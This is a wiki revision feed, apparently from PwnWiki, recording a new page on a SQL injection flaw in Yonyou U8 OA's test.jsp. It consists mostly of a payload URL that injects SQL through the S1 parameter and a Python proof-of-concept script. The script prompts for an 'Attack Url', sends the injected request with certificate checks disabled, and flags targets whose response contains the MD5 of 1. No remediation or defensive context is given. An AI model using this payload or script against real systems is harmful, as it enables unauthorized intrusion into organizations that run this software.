https://pwnwiki.com/index.php?action=history&feed=atom&title=%E7%94%A8%E5%8F%8B_U8_OA_test.jsp_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E 用友 U8 OA test.jsp SQL注入漏洞 - Revision history 2026-04-14T14:47:10Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=%E7%94%A8%E5%8F%8B_U8_OA_test.jsp_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1891&oldid=prev Pwnwiki: 建立內容為「==Payload== <pre> /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1)) </pre> ==POC== <pre> import requests import sys import random import re from req…」的新頁面 2021-04-25T04:05:06Z <p>建立內容為「==Payload== &lt;pre&gt; /yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20MD5(1)) &lt;/pre&gt; ==POC== &lt;pre&gt; import requests import sys import random import re from req…」的新頁面</p> <p><b>New page</b></p><div>==Payload==<br /> &lt;pre&gt;<br /> /yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20MD5(1))<br /> &lt;/pre&gt;<br /> <br /> ==POC==<br /> &lt;pre&gt;<br /> <br /> import requests<br /> import sys<br /> import random<br /> import re<br /> from requests.packages.urllib3.exceptions import InsecureRequestWarning<br /> <br /> def title():<br /> print('+------------------------------------------')<br /> print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')<br /> print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')<br /> print('+ \033[34m公众号 : PeiQi文库 \033[0m')<br /> print('+ \033[34mTitle : 用友 U8 OA test.jsp SQL注入漏洞 \033[0m')<br /> print('+ \033[36m使用格式: python3 poc.py \033[0m')<br /> print('+ \033[36mFile &gt;&gt;&gt; ip.txt \033[0m')<br /> print('+------------------------------------------')<br /> <br /> def POC_1(target_url):<br /> vuln_url = target_url + &quot;/yyoa/common/js/menu/test.jsp?doType=101&amp;S1=(SELECT%20md5(1))&quot;<br /> headers = {<br /> &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&quot;,<br /> }<br /> try:<br /> requests.packages.urllib3.disable_warnings(InsecureRequestWarning)<br /> response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)<br /> if &quot;c4ca4238a0b923820dcc509a6f75849b&quot; in response.text and response.status_code == 200:<br /> print(&quot;\033[32m[o] 目标 {}存在漏洞 \n[o] 响应地址: {} \033[0m&quot;.format(target_url, vuln_url))<br /> else:<br /> print(&quot;\033[31m[x] 目标 {}不存在漏洞 \033[0m&quot;.format(target_url))<br /> except Exception as e:<br /> print(&quot;\033[31m[x] 目标 {} 请求失败 \033[0m&quot;.format(target_url))<br /> <br /> if __name__ == '__main__':<br /> title()<br /> target_url = str(input(&quot;\033[35mPlease input Attack Url\nUrl &gt;&gt;&gt; \033[0m&quot;))<br /> POC_1(target_url)<br /> &lt;/pre&gt;</div> Pwnwiki